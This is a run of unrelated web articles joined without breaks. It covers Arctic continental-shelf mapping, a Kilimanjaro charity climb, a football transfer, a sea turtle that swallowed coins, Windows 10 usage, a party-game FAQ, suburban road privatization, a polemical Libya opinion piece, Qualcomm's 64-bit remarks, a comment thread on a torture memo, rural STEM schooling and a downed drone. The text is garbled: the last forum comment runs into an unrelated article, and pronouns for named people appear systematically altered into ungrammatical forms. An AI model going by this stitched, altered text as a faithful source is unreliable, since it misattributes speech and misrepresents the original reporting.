With Shell receiving conditional approval to drill in the Chukchi Sea in offshore Alaska, the phrase “continental shelf” has come up a lot lately. The term also appears whenever territorial disputes in the Arctic make the news. But maps such as this one published by the Economist don't exactly clarify what the continental shelf is, nor how its geography and terrain are literally at the bottom of so many disputes in the Arctic and indeed worldwide. So how can we better depict this underwater terrain, especially up north?
The International Bathymetric Chart of the Arctic Ocean (IBCAO) is the gold standard when it comes to cartographically displaying the texture of the continental shelf in the Arctic. The map has a resolution of 500 meters and much of the data comes from state-of-the-art multibeam surveys. You can read more about how the map was made in a paper published in Geophysical Research Letters in 2012.
However, what the map doesn't display is geopolitical data. It's interesting, for instance, to overlay the outlines of countries' exclusive economic zones (EEZs) onto the bathymetric data. But before we do that, let's look a bit more at the shelf's topography.
The geological shelf
Using the ETOPO1 1 Arc-Minute Global Relief Model available from the National Oceanic and Atmospheric Administration, I made a simple map in ArcGIS displayed at the top of this post of the continental shelves in the Arctic.* While the continental shelf exists in reality as an underwater extension of a continent, it's important to remember that even the idea of a continent is a social construct. If we were to redraw the world's continents from an underwater, continental-shelf based perspective, we likely wouldn't divide North America and Asia.
With this in mind, it becomes clear why it will be so hard to divvy up the continental shelf. Due to the presence of countries on top of the continental shelves, they will ultimately not be so much geologically as politically defined. Is the much-disputed Lomonosov Ridge, for instance, an extension of the Canadian, Russian, or Danish continental shelf? The fact that each country could claim it based on supposedly objective bathymetric evidence demonstrates the malleability of geology to political aims.
Yet divide the shelves they will, and that's because sizable deposits of oil, gas, and other natural resources lie in wait. The continental shelves are where all Arctic offshore drilling will occur, with drilling looking something like this Gazprom diagram. As the U.S. Geological Survey stated in 2008, “The extensive Arctic continental shelves may constitute the geographically the largest unexplored prospective area for petroleum remaining on Earth.” Their survey did not include the oil and gas resources that might lie in the seabed in the middle of the Arctic Ocean where the continental shelves drop off. By the time technology reaches a state where deepwater drilling in the Central Arctic Ocean becomes possible, humanity will hopefully have transitioned away from relying on fossil fuels.
Viewed in 3D, the nearly “landlocked” nature of the Arctic Ocean becomes evident, too. The Arctic Ocean is the world's smallest, shallowest ocean. Its low average depth of ~1,000 meters is partly a result of the extension of many continental shelves, especially Russia's, far into the ocean. The oil and gas exploration taking place on the shelf right now is therefore happening in relatively shallow water. Shell's plans this summer on the Alaskan continental shelf entail drilling in water depths of about 42 meters. This is much shallower than deepwater drilling, which is typically characterized as occurring in depths of more than 150 meters. While Arctic offshore oil and gas drilling faces a number of environmental challenges, deepwater is not one of them at the moment.
A 3D perspective also illustrates the degree to which Russia faces the north. Its major rivers, the Ob, Yenisey, and Lena, drain out to the Arctic Ocean. The image below reveals how the Ob River cuts a chasm into the tundra as it rushes north. In the Soviet era, some politicians and scientists sought to reverse the northward flow of the country's three major rivers so that they would irrigate the deserts of Central Asia for agriculture instead of “wastefully” flowing into the Arctic Ocean. Now, as the country turns north again and looks out towards a warming ocean with new possibilities for shipping and natural resource extraction, many Russians may be glad that their rivers still flow to the “northern icy sea,” as the Arctic Ocean is called in Russian (северный ледовитый океан).
The legal shelf
The continental shelf is knee-deep in legalities, clauses, and commissions. Article 76 in the United Nations Convention on the Law of the Sea defines the continental shelf of a Coastal State as:
“the seabed and subsoil of the submarine areas that extend beyond its territorial sea throughout the natural prolongation of its land territory to the outer edge of the continental margin, or to a distance of 200 nautical miles from the baselines from which the breadth of the territorial sea is measured where the outer edge of the continental margin does not extend up to that distance.”
The treaty was adopted in 1982, riding the crest of an upswing in the usage of the phrase “continental shelf” in English language publications as evinced by this Google ngram.
It's hard to materially grasp the notion of the continental shelf when it is defined in terms of nautical miles, baselines, and continental margins – terms unfamiliar to most laypeople, which is why maps that integrate geology and geopolitics are important. In the Arctic, the two are inseparable, after all. The territorial disputes there all hinge on each Arctic coastal state's claims to their respective continental shelf. Once a claim is recognized, a country earns the exclusive right to explore and exploit its resources, both living and non-living.
Claims are submitted to the United Nations Commission on the Limits of the Continental Shelf (UN CLCS), which is composed of 21 mostly male engineers, geologists, hydrographers, and other scientists from around the world. Members are elected for five year terms, with the current term lasting from 2012-2017. All of the commission's members have real jobs, meaning that the UN CLCS is a side gig for them. That may explain why the commission's website hasn't been updated since September 2013. This group makes recommendations on country's submitted claims, but they are expressly apolitical and often will not consider data from disputed areas. As such, countries can opt to only submit data in undisputed areas, coordinate claims with neighboring countries, or even make a joint claim.
Once a country's submitted geological information is deemed scientifically sound, it is up to neighboring states to mutually delimit their borders. The United Nations will not delimit any borders on the continental shelf. If the countries can't agree between themselves, they can go to the International Court of Justice – as happened in 1993 between Denmark and Norway over the area between Greenland and Jan Mayen. Canadian law professor Michael Byers has written a book called International Law and the Arctic that goes into the various submission options in much more detail for readers who are interested (and the section on continental shelf claim submissions is freely available to read on Google Books, too).
The geopolitical shelf
Now we can take a look at the bathymetric data with some geopolitical data overlaid. As the map above reveals, Russia has by far the largest continental shelf of any Arctic country. It's no surprise that the country has moved the quickest of all the Arctic coastal states in exploiting its offshore oil and gas, for it simply has a much bigger amount of offshore territory to exploit. In Canada, by contrast, the country's archipelago almost extends to the northernmost edge of the continental shelf. Delineations of the continental shelves and the respective EEZs also affect where current oil and gas exploration can take place. On the one hand, resolving territorial claims can be conducive to extraction since it removes gray areas from the map. Transnational corporations will simply not drill for oil in areas where the legal regime is unclear. On the other hand, corporations do have to be acutely aware of where EEZs lie so as not to wander into another country's zone. In 2012, Shell's leases in the Burger Prospect in the Chukchi Sea, issued by the U.S., stopped just before the boundary with the Russian EEZ. (This year's exploration plans will take place a little bit farther west.)
A map of continental shelves doesn't just hint at where future territorial claims and oil and gas exploration may take place. It also helps shed light on past movements of humans. For instance, Alaska and Chukotka, in eastern Russia, pretty much look like they lie on one extended sunken landmass, which some refer to as Beringia. This name evokes the migration that humans from Northeast Asia made across the Bering Strait to North America some 18,000 years ago. Back then, such political constructs of nations and continents didn't exist. Instead, a grassy tundra covered the land for as far as the eye could see. Today, Beringia is an undersea relic of the Ice Age, with beluga whales and walruses swimming above the watery landscape once crossed by humans. Imagine how the geopolitics of the Arctic would differ today if the sea level was a few hundred feet lower and the continental shelves of the Arctic rose above the surface of the water.
Note
*After making these maps, I came across GEBCO's higher-resolution 30-arc second model gridded bathymetric chart of the oceans, which I will use in future maps.
First Qatari women successfully scale Mt. Kilimanjaro in charity effort
ian 1602/Flickr
A team of 12 young Qataris and expat residents has successfully scaled the summit of Mt. Kilimanjaro in Tanzania, with the female members becoming the country's first women to reach the top of the world's tallest free-standing mountain.
Describing minor injuries, an arduous overnight final climb during a storm, one of the six women in the group said they overcame “mental, physical and emotional struggles” to make the 5,895 meters (19,341 feet) climb.
Dana Al Anzy/Instagram
The climbers scaled the mountain to raise money for charity under Reach out to Asia (ROTA)'s Elevate to Educate expedition. They hope to raise QR1 million in funds to boost Gaza's education system by rebuilding and improving schools.
The team was led by Sheikh Mohammed bin Abdullah Al Thani, who last year became the first Qatari to climb and raise Qatar's flag at Mount Everest's peak and has twice climbed the summit of Kilimanjaro, in 2010 and again in 2011.
This is the first time the experienced climber has organized a group campaign for charity.
The climbers, plus two assistants, set out on the expedition on Oct. 2.
They are Mohammed Fakhro, Yacoub Yousef Al Yacoub, Mariam Hassan Al Thani, Aisha Al Naama, Mohammed Al Naama, Bashaer Al Mulla, Dana Al Anzy, Nasser Bin Marzook, Asma Al Thani, Noor Al Thani, Bader Al Madani, Raed Zidan and Masoud Kalafchi. Yazan Abughaida, a Palestinian, also signed up at the last minute and scaled the mountain.
Summit success
In a voice message posted on their blog on October 8, Al Thani said that the whole team had successfully completed the challenge, walking overnight to reach the summit, before descending to rest at a camp at 3,800 meters.
“We left camp at 11:30pm to go to the summit. It was a clear day, although cold. It was a bit uncomfortable for a few of the climbers. We had 100 percent success rate. Everyone made it up and down safely… everyone is tired after a long day,” Al Thani added.
Dana Al Anzy, a member of ROTA's Youth Advisory board and an undergraduate student at Georgetown University SFSQ, was one of the six women to complete the challenge.
In an Instagram message posted yesterday, they described some of the trials they and their teammates faced:
“Qatar's women have made it to the top of Africa. After 7 days of mental, physical and emotional struggles varying between missing my family during Eid, twisting my wrist on the second day of the climb and being oxygenated for lacking oxygen at 4600 meters – Your prayers and support kept me going at -15 degrees on the 7 hour climb over a stormy night up to the summit. Whenever the voice in my head whispered to go back, I remembered this support system ❤️ I hope I have done you all proud.”
Mohammed Fakhro/Instagram
On Friday, group member Mohammed Fakhro also used the social networking site to include a photo of them reaching the peak, and to announce the team's success, saying, “Got to the summit of Kilimanjaro & back safely. Back to Doha in 2 days with photos from the top of Africa.”
Before setting off, the team had planned to spend five days climbing to the summit and two days descending, before spending the last days of the trip learning about Tanzania's culture through various cultural excursions, including a safari trip.
Organized through ROTA's “My Education… My Hope” campaign, the funds raised through the expedition will go towards building and revamping 22 schools in the Gaza strip.
In a Facebook post today, Abughaida said:
“Final amount raised on my campaign: $15,015 or QR54,804. To Elevate to Educate team collectively raised over 2 million QR to build and supply schools in Gaza. Thank you for your donations and support.”
Preparations
In August, Fakro spoke to Doha News while the team was in training for the challenge. In a video blog about their training, they thanked people for making generous contributions that kept up their motivation and focus:
“I feel like my body does not really belong to me anymore. I cannot have junk food, I cannot have ice cream, I cannot slack off, I cannot take a day off. Your donations mean I need to get up there, no matter what it takes.”
They added that climbing Kilimanjaro had been a personal ambition for many years. They told Doha News they hoped that the challenge would also improve them as a person.
“Having lived a life of privilege, I try to commit to critically examining how I live my life, how my choices affect others and most importantly how I can leave a positive impact in my community. Simply put, I hope to be a better human to other humans.”
Ahead of the trip, Al Anzy described why they were undertaking the challenge. The Peninsula reports them as saying they hoped it would “motivate other women to pursue their dreams and ambitions, regardless of the obstacles and battles they face in our society.”
“I want to promote the culture of social responsibility across borders and allow people's horizons to expand beyond the limits of what surrounds them,” they added.
You can still donate on the team's Just Giving webpage Just Giving website here.
Thoughts?
Note: This article has been corrected to reflect the updated roster of climbers
• Transfer of Egypt winger could be finalised this week, according to reports • Salah scored 15 goals and assisted 13 others in Serie A last season
Liverpool are close to agreeing a £35m deal for Roma's Mohamed Salah, with reports suggesting the Egypt winger could finalise a move to Anfield this week.
Talks have been continuing between the parties for some time and Roma rejected an initial £28m bid from Liverpool a few days ago. However, Jürgen Klopp is determined to acquire Salah and, with the player also believed to be keen on the switch, it appears an agreement is close to being reached following an increased bid from the Merseysiders.
Should the transfer happen it would be a case of second time lucky for Liverpool, who wanted Salah in 2014 only to see them move to Chelsea instead from the Swiss club Basel. They struggled to make an impact at Stamford Bridge, however, and in 2015 moved to Italy, joining Fiorentina on loan before moving to Roma, also on loan, soon after.
That became a long-term move last August and Salah has subsequently flourished for the Giallorossi. In the 2016-17 Serie A season the 24-year-old scored 15 goals and assisted 13 others in 31 league appearances.
Klopp believes Salah can provide Liverpool with an injection of pace in their attacking front line, something that is all but absent when Sadio Mané is unavailable, as they were for the whole of January after travelling to Gabon to represent Senegal at the Africa Cup of Nations and then for the final six weeks or so of the campaign just finished after collecting a knee injury in the 3-1 victory over Everton on 1 April.
Such is Liverpool's determination to acquire Salah that they are willing to make them the joint most-expensive signing in their history, following on from the £35m spent on purchasing Andy Carroll from Newcastle United in January 2011. Salah is expected to earn in the region of £90,000 a week at Anfield.
Liverpool have already signed one player in the close season – the England Under-20 striker Dominic Solanke, who will arrive on Merseyside on 1 July following the end of their contract with Chelsea – and, with the club having reached the Champions League qualifying stages, Klopp is determined to add to their resources between now and the first leg in August.
As well as targeting Salah, the German is also believed to be keen on acquiring Alex Oxlade-Chamberlain from Arsenal, Naby Keita from Red Bull Leipzig and the Southampton defender Virgil van Dijk.
Tossing coins into a fountain to bring good luck is a popular superstition, but the practice brought misery to a sea turtle in Thailand from which vets have removed 915 coins.
Vets in Bangkok operated on Monday on the 25-year-old female green sea turtle nicknamed Bank, whose indigestible diet was the result of tourists seeking good fortune by tossing coins into their pool over many years in the eastern town of Sri Racha.
Many Thais believe that throwing coins on turtles will bring longevity. But the coins eventually formed a 5kg ball in Bank's stomach. The weight cracked their ventral shell, causing a life-threatening infection.
Facebook Twitter Pinterest A team of five surgeons from Chulalongkorn University's veterinary faculty prepares to operate on Bank. Photograph: Sakchai Lalit/AP
Five surgeons from Chulalongkorn University's veterinary faculty removed the coins over four hours while Bank was anesthetised. The ball was too big to take out through a 10cm incision, so it had to be removed a few coins at a time. Many of them had corroded or partially dissolved.
“The result is satisfactory. Now it's up to Bank how much they can recover,” said Pasakorn Briksawan of the surgical team. The turtle, recovering in the university's animal hospital, will be on a liquid diet for the next two weeks.
Bank was brought to the vets by the navy, which found them ailing in their seaside hometown.
Facebook Twitter Pinterest A CT scan of Bank showing the 5kg ball of coins that became lodged in the green sea turtle's stomach. Photograph: Athit Perawongmetha/Reuters
It was only after a 3D scan that vets discovered the problem. As well as the coins they found two fish hooks, which were also removed.
The surgery team leader said that when they discovered the cause of the turtle's agony they were furious.
“I felt angry that humans, whether or not they meant to do it or if they did it without thinking, had caused harm to this turtle,” said Nantarika Chansue, head of Chulalongkorn University's veterinary medical aquatic animal research centre.
Facebook Twitter Pinterest Bank rests next to a tray holding the 915 coins that were removed from their stomach. Photograph: Athit Perawongmetha/Reuters
Thai media began publicising the turtle's tale last month after they were found, and the public donated about 15,000 baht (£350) for their surgery.
Typically, a green sea turtle has a lifespan of about 80 years, said Roongroje Thanawongnuwech, dean of the university's veterinary faculty. It is listed as an endangered species by the International Union for Conservation of Nature.
Microsoft has just kicked off Build 2017 with the unveiling that Windows 10 is now in use by over 500 million Windows 10 devices, up 100 million from the last major milestone back in September 2016.
As a reminder, Mirosoft counts not only Windows 10 PCs and tablets, but Xbox, HoloLens, and even Windows 10 Mobile in that number too. Unfortunately, Microsoft hasn't detailed how many of those users are using Windows with a Microsoft account, or how many people out of that number are using universal Windows Apps on the regular.
Microsoft did reveal that 141 million users are now using Cortana, which is a bigger number than we were expecting. In an ideal world, all 500 million users would be using Cortana, but 141 million active Cortana users is still an impressive feat.
Of course, Microsoft's original goal was to have Windows 10 in use by one billion users around about now, but the company is 500 million users short. Microsoft has been open about this in the past, saying they knew they wouldn't be able to make it several months before their deadline of 2 years since the Windows 10 launch.
What do you think about the rate of new installations? Let us know.
FAQS
How can I buy What Do You Meme??
You can buy it right here on our site.
How many players does the game support?
The game is meant for groups of friends and family. As few as 3 and as many as 20.
What's the age range?
The game is meant for teens and adults. Because it contains some profanity, the game is 17+.
How long does it take to learn how to play?
If you use the Internet, then you should have a firm grasp of the game within 30 seconds.
Does the game ship to countries other than the US?
Yes, it ships to Canada, Europe, and more. For a full list of the countries please see the Terms.
How fast will the game ship?
Depending on where you are, it will take 3-5 business days and then the time for usps transit (domestic is 2-4 days and international is 6-30 days dependent on customs clearance). International orders are country specific. See the Terms for a more in-depth breakdown.
How do you handle image rights with the memes in the game?
We license all memes in What Do You Meme? from the prospective rights owners. Once we identify a meme we'd like to add to the game, we contact the rights owner and execute a licensing agreement. If we're not able to come to terms with the rights owner, we do not add the meme to the game.
Why does this game exist?
To make you laugh with your friends and family.
Are there more expansion packs in the works?
Yes there are :) and we can't wait to release them. We will keep you updated.
Is the game available in retail stores?
Yes, it is available in select retailers. For all wholesale inquiries, please email info@WhatDoYouMeme.com
From the Chicago Tribune comes the strange story of Long Grove, a well-to-do suburb that nevertheless can't pay to maintain its roads. Housing permits helped subsidize the cost of road maintenance in the village for years. Then the crash hit and the permit fees dipped to zero, which the Tribune emphasizes in its accompanying bar graph by writing "0" where there's already no bar. Now Long Grove has resorted to an "unusual plan":
Facing an annual funding gap of more than $1 million, Long Grove trustees have twice in recent months affirmed a plan that could privatize nearly half of the village's public roads — transferring the cost of upkeep and plowing to the residents in the process.
It's an uncertain time for public roads in general. Deals to privatize public infrastructure have been on the rise in recent years, and experts believe the trend will only continue. The difference in Long Grove's case is that we're talking about a local road network with no hope for the toll revenue that's attracting business partners to major highways and bridges. What Long Grove seems to mean by privatization is closer to what occurred in pre-colonial post road days: everyone taking care of their own.
It's an uncertain time for public roads.
The story is worth a full read; Tribune reporter Duaa Eldeib did a bang-up job collecting local characters. One resident makes a phenomenal reference to non-existent "road fairies." The village president discusses physical roads and metaphorical roads in the same sentence. There's a general air of gated-community-neighbor against gated-community-neighbor. These are troubled times in Long Grove.
They're also quite strange ones, and there's a lot about the situation that doesn't make great sense to an outsider. For one thing, there's a very straightforward alternative to privatization: residents can tax themselves and still have the village do the maintenance. That idea doesn't sound so bad when you're considering that Long Grovers don't pay a property tax. And apparently half the village roads are already privatized, so is really the start of an unknown era?
Lawyers in the case of a Georgia man accused of intentionally leaving their toddler son in a hot SUV to die are scheduled to begin questioning potential jurors.
Justin Ross Harris faces charges, including murder, and has been in jail since the day their son died. Police say their 22-month-old son Cooper died after spending about seven hours in the vehicle on a hot June day in 2014.
Potential jurors on Tuesday filled out a 17-page questionnaire that included questions about what they know about the highly publicized case. Groups of jurors will be brought in for questioning by the lawyers starting Wednesday.
Jury selection is expected to last at least into next week.
The questionnaire notes the trial could last four to six weeks once opening statements begin.
Harris is a native of Tuscaloosa, Ala.
By Brandon Turbeville
As time passes over the foreign policy of Western nations, the façade of promoting “freedom” and “democracy” passes with it. Even with well-established propaganda mechanisms in place to convince the Western public that NATO involvement in the Middle East and North Africa (MENA) serves a noble purpose, there are breaks in the wall of nonsense that passes for official explanations and mainstream media reporting that document the NATO march of terror across the world that is currently underway.
In this case, the lie is that a direct Western presence in Libya is anything other than a return to open colonialism by the very powers who perpetrated it in years past on the very same territory.
The latest crack in the façade (for those paying attention), is the deployment of a joint British-Italian force consisting of 6,000 soldiers to Libya under the guise of defeating ISIS.
It is estimated that there are around 4,000 ISIS fighters present in Libya at the moment and that these fighters pose a significant threat to the national security of European nations as well as a number of oil fields located in Libya.
As Colin Freeman writes for the Telegraph,
Pressure for British troops to be deployed against Islamic State militants in Libya grew on Monday after the terror group attempted to seize the country's largest oil depot. At least two people were killed when Isil fighters launched a combined gun and suicide car bomb attack on the Sidra oil port on Libya's Mediterranean coast. A rocket fired into a 420,000 barrel oil tanks also sparked a huge blaze. Sidra lies around 130 miles east along the coast from the late Colonel Gaddafi's home city of Sirte, where Isil first raised its black jihadist flag a year ago. The prospect of Isil also grabbing lucrative oil facilities will increase pressure on Britain to press ahead with a plan to send troops to help Libya's fledgling government push Isil out.
Libya was “offered help” by Britain provided that the two separate Libyan governments – the more secular House of Representatives and the Islamist General National Congress – form a unity government, which both parties did shortly before Christmas.
It is noteworthy that the British press reported the decision to form a unified government in terms of the deployment of British troops as opposed to the domestic political repercussions in Libya itself.
With the formation of the unity government, British troops, along with Italian ones (notably Libya's previous colonial controller), are apparently on their way, although the plan appears that it will take a few months to be put in place.
Download Your First Issue Free! Do You Want to Learn How to Become Financially Independent, Make a Living Without a Traditional Job & Finally Live Free?
Download Your Free Copy of Counter Markets
As Freeman reports, “Under the plan, up to 1,000 British troops would form part of a 6,000-strong joint force with Italy – Libya's former colonial power – in training and advising Libyan forces. British special forces could also be engaged on the front line.”
Regarding the ISIS attack on the Libyan oil facility, Freeman writes that “While Sidra's oil depot has been out of action for much of the past year because of Libya's ongoing civil war, capturing it would still have been a major prize for Isil, which has earned millions of dollars from its control of oil facilities in Syria.”
Of course, with the deployment of Italian and British troops to the country, it is both Italy and the UK who are set to hold the oil ports near the Mediterranean coasts with the new Libyan coalition government serving as a mere cover for NATO control, a convenient “coincidence” for the European powers who would love to have control of yet another source of oil, particularly of the Libyan variety.
Chipworks
Qualcomm is now saying that 64-bit computing is the future, after dismissing Apple's 64-bit A7 processor last week.
Anand Chandrasekher, senior vice president and chief marketing officer at Qualcomm, characterized Apple's 64-bit A7 chip, which debuted in the iPhone 5S, as a "gimmick" last week in an IDG News Service story.
"I know there's a lot of noise because Apple did [64-bit] on their A7. I think they are doing a marketing gimmick. There's zero benefit a consumer gets from that," Chandrasekher said in an interview.
Qualcomm is singing a different tune this week. The San Diego company issued the following statement Tuesday:
The comments made by Anand Chandrasekher, Qualcomm CMO, about 64-bit computing were inaccurate. The mobile hardware and software ecosystem is already moving in the direction of 64-bit; and, the evolution to 64-bit brings desktop class capabilities and user experiences to mobile, as well as enabling mobile processors and software to run new classes of computing devices.
ARM, the company behind the 32-bit chip designs from Qualcomm, Apple, Samsung, and Nvidia, believes that there will be a need for 64-bit ARM chips in future smartphones and tablets.
James Bruce, ARM's lead mobile strategist, explained to CNET last month that high-end smartphones and tablets are already headed toward 64-bit computing.
Jefferies analyst Peter Misek said last month in a note to investors that Apple's switching to the 64-bit A7 processor may not benefit Apple in the short term but "we believe that longer term it is a game changer as apps are rewritten and cross platform capabilities become utilized."
READER COMMENTS ON
"Torture Memo Revealed: Administration Can Do Anything, Kill Anybody, Torture Anybody, Anytime and Anywhere They Want To"
(16 Responses so far...)
COMMENT #1 [Permalink]
... molly said on 4/2/2008 @ 3:23 pm PT...
Reason enough to impeach with no investigation. We have an unusual situation with our current president. Whereas most criminals try to hide their criminal acts. Our pres. and vice pres. enjoy the telling and retelling of the many different ways they have broken the law.So Pelosi's concerns that all the important House legislation that would not get passed as the reason for not impeaching is nuts.No time lost in the time consuming investigation....if the idiots are admitting their wrong doing. Wonder why Pelosi didn't notice there wouldn't have to be an investigation?
COMMENT #2 [Permalink]
... Off the Grid said on 4/2/2008 @ 3:37 pm PT...
Investigate , Impeach, Imprison!
COMMENT #3 [Permalink]
... brock said on 4/2/2008 @ 4:02 pm PT...
Did anyone see 60 Minutes on Sunday reporting on German citizen tortured and held without charge for 5 years?
Face it - this IS our America. We torture.
COMMENT #4 [Permalink]
... plunger said on 4/2/2008 @ 4:58 pm PT...
Under the Yoo Doctrine, America will be at war forever, and can do as it pleases, provided it never “declares” war. I'm sure that the veterans of all prior wars will be delighted to learn that their efforts were for naught, and that we have lost the ultimate battle to the enemies within, who have destroyed virtually EVERYTHING they fought (and many died) to defend. If AARP doesn't raise its voice and rally the seniors to vanquish these evil bastards, who will? Hey all you gray hairs, we need you again…report for duty! It's time for the Greatest Generation to reveal the traitors once and for all, and return America to the PEOPLE.
COMMENT #5 [Permalink]
... plunger said on 4/2/2008 @ 5:01 pm PT...
Two years ago, Cheney appeared on Larry King. They stepped in it big time, but few people caught it. I alerted Rude Pundit and they wrote about it. an excerpt: Then Cheney made this statement: "In a sense, when you're at war, you keep prisoners of war until the war is over with." So, like, if, in a sense, the Gitmo campers are "prisoners of war," then, in a sense, don't they get Geneva Conventions protections? Cheney and Gonzales have been playing a semantics game to justify torture, since "war" was never formally declared. It's pretty obvious why they chose to embark upon the path of war without ever formally declaring it - so they could not be held accountable for the War Crimes they knew they'd be committing. Bush tells us every day that we're at war. Cheney and Gonzales tell us that we're not REALLY at war. Problem is, Cheney is on tape stating not only that we are at war, but that we are holding "prisoners of war." The Geneva Conventions DO APPLY, and Cheney is guilty of war Crimes. http://transcripts.cnn.c...IPTS/0505/30/lkl.01.html KING: They specifically said, though, it was Guantanamo. They compared it to a gulag. D. CHENEY: Not true. Guantanamo's been operated, I think, in a very sane and sound fashion by the U.S. military. Remember who's down there. These are people that were picked up off the battlefield in Afghanistan and other places in the global war on terror. These are individuals who have been actively involved as the enemy, if you will, trying to kill Americans. That we need to have a place where we can keep them. In a sense, when you're at war, you keep prisoners of war until the war is over with." So this is the war without end, and these prisoners will be held forever?
COMMENT #6 [Permalink]
... Agent 99 said on 4/2/2008 @ 5:31 pm PT...
Heh, plunger, I love it. Sure doesn't look as though The Greatest Generation is getting any competition for its title, now does it?
COMMENT #7 [Permalink]
... Lora said on 4/2/2008 @ 5:34 pm PT...
I absolutely abhor our government's use of torture and refusal to accord due process. But. I must confess, when I thought about what would occur if the PEOPLE followed their own misbegotten policies with respect to THEM, the Great Perpetrators, I did grin.
COMMENT #8 [Permalink]
... Dredd said on 4/2/2008 @ 6:00 pm PT...
The memo obviously tells it like it is. Amurka is the government, and everyone else has gone to look for America. Even though the right are the wrong, it does not matter when Amurka is in power. The theme song is "Talk, Talk". The song is better than the reality.
COMMENT #9 [Permalink]
... the zapkitty said on 4/2/2008 @ 6:03 pm PT...
... Lora said... "I absolutely abhor our government's use of torture and refusal to accord due process. But. I must confess, when I thought about what would occur if the PEOPLE followed their own misbegotten policies with respect to THEM, the Great Perpetrators, I did grin." Reminds me of a quote from Ron Silver when a Democratic President took power...
"It's OK! Those are our planes now!" Reject and denounce torture. Impeach, Convict, commence war crimes trials, and then execute them if the court indicates that such punishment is required... but make it quick.
COMMENT #10 [Permalink]
... Lora said on 4/2/2008 @ 6:27 pm PT...
Zapkitty, ... Lora said... "I absolutely abhor our government's use of torture and refusal to accord due process. But. I must confess, when I thought about what would occur if the PEOPLE followed their own misbegotten policies with respect to THEM, the Great Perpetrators, I did grin." Reminds me of a quote from Ron Silver when a Democratic President took power...
"It's OK! Those are our planes now!" It was just a passing fantasy... Reject and denounce torture. I do.
COMMENT #11 [Permalink]
... Dredd said on 4/2/2008 @ 6:34 pm PT...
The government is torturing the people by ignoring them. We should not return the 'favor'. We should follow our American tradition, waive the Amurkan flag, and wave the American flag. Most likely these daze, when someone wears a flag on a lapel, it is an Amurkan flag.
COMMENT #12 [Permalink]
... JUDGE OF JUDGES said on 4/2/2008 @ 9:49 pm PT...
Hmmm... Be the Court. (somebody's got to) ~ Net Nuremberg ~
COMMENT #13 [Permalink]
... 72dawg said on 4/3/2008 @ 3:53 pm PT...
No my America. Where is OUR UnAmerican Activities Investigation?
COMMENT #14 [Permalink]
... Mugzi said on 4/3/2008 @ 5:09 pm PT...
Unfortunately, in this country war is a business to make BIG money. Citizens are very naive and when someone waves a flag and shout patriotism, off we go to war to make companies very rich at the expense of our young people, no questions asked. gw and cheney do not have a conscience since they rationalize Iraq in the fact that our soldiers are "volunteers". John Cusack was on Bill Maher last Friday and they really hit the nail on the head. They have a movie coming out, War, Inc. which should be very interesting - art imitating life.
COMMENT #15 [Permalink]
... jekbradbury said on 4/4/2008 @ 7:27 pm PT...
you idiots are totally wrong. steve bradbury, olc head, declassified the memo by their own free will. it had nothing to do with foia, which does not have jurisdiction over classified material.
COMMENT #16 [Permalink]
... Ben said on 4/5/2008 @ 2:24 am PT...
With fewer students per school and limited funding to match, rural school districts have been behind in STEM education. “Rural districts are particularly concerned because, as we're getting into 21st century learning, they're having a hard time keeping up, largely due to money as well as [teacher] recruitment and retention issues,” said Denise Harshbarger, the supervisor for special projects at the North East Florida Education Consortium, an organization that represents the shared issues of 15 rural districts.
Recruitment is a major issue. “I think our biggest challenge has been finding teachers who are willing to work in a rural community, which traditionally means their salary will be slightly lower than in nearby larger districts,” Harshbarger said. “And if you don't have the teachers who are really able to know STEM subjects and be able to transfer that to students, then you're not going to be able to catch students up with the curve.”
Diane Ward is the Vice President for Student Learning and Chief Academic Officer for Roane State Community College, which partnered with the Rural Communities STEM Initiative that serves the interests of nine rural districts in Tennessee. For Ward, the personnel issue was most apparent in middle school science classrooms. The schools have great teachers, they said, but some seventh and eighth grade science teachers don't have in-depth knowledge about scientific topics because they've been moved from the multidisciplinary classrooms of younger grades. In many cases, teachers with enough knowledge in one area might be forced to take on other specialties because of understaffing. “And even though teachers may have working knowledge in some areas of STEM, it may not be in-depth enough to teach a class in another STEM area,” Ward added.
Staffing problems are compounded by a lack of facilities. “In a very rural area, for middle schools in particular, there simply are no labs,” Ward said. No understanding of STEM concepts can be complete without a grasp of their application, and hands-on labs can do wonders to reinforce these concepts, Ward added.
In Florida, educators are more concerned about the lack of digital technology in their schools. “The advancement we've seen in digital learning for STEM education in the past few years has taken on a whole new meaning,” Harshbarger said. “It's really a culture shift toward student-centered, almost personalized learning, and we're at that bleeding edge [of integrating this technology] in lots of districts now.” In the near future, rural districts will take a hard look at what technology is needed to augment their curricula and try to get the necessary funding to afford it.
Some districts have sought additional grants to make their infrastructure match the level of instruction their students need. But others have entered partnerships with local businesses that lend students their time, money, and resources. In the nine Tennessee districts involved in the Rural Communities Stem Initiative, Ward said, a meeting of local educators, administrators, parents and business owners posed the question: What can we do to help with STEM education? “Everyone's expectation was for the school systems to request a check from the businesses, but they got a very different answer,” they said.
MARIUPOL, Ukraine — A Russian drone was shot down over the weekend during heavy fighting against separatist forces near the government-held port city of Mariupol in southeastern Ukraine, according to Ukrainian forces.
The drone was quickly identified as a Russian-designed and manufactured drone designated E08 by its manufacturer, the Enics company, whose logo and name appear in Cyrillic on its fuselage. The E08 was principally designed as a target for practice by Russian air and air defense forces, which explains why it is painted a highly visible orange color.
Members of Ukraine's 37th Mechanized Battalion, who brought down the drone, saw it crash into the Azov Sea, fringing the conflict zone. It then took two days to locate, haul out of the water and transport to their base on the outskirts of Mariupol.
The drone was shot down on Saturday, just hours before a ceasefire intended to halt fighting between Russian-backed separatists and Ukrainian forces.
“The presence of these drones is just one more bit of proof that Russia is supplying equipment and weapons to the separatists,” said the battalion's deputy commander, whose nom de guerre is Artem. “The only place they can get these from — and there are many Russian drones at work in this conflict — is from Russia. Moscow also supplies the operators for these drones as they're too sophisticated for the separatists themselves.”
One of the battalion's men, who saw the drone flying over the battlefield on Saturday and was involved in its recovery, said that Ukrainian forces opened fire using a variety of weapons. “From the type of shrapnel damage to the engine exhaust, it looks to me like it was probably a hand-held surface-to-air missile that hit it,” they said.
The drone was recovered about 50 feet from shore in shallow water.
Ukraine has been developing its own small unmanned aircraft, but Russia's defense industry is several years ahead and there have been previous reports that separatists forces have been using Russian-supplied drones in the conflict.
The drone that was shot down has a range of 93 miles and 30 minutes flying time; it can fly up to 186 miles per hour and up to an altitude of 9,842 feet; its fuselage is over 13 feet and its wingspan is over 16 feet. When it was unveiled at Russia's international aviation and space products showcase, the MAKS 2009 Airshow, the Enics company said that the drone could also carry TV and photographic equipment to adapt it for surveillance use.
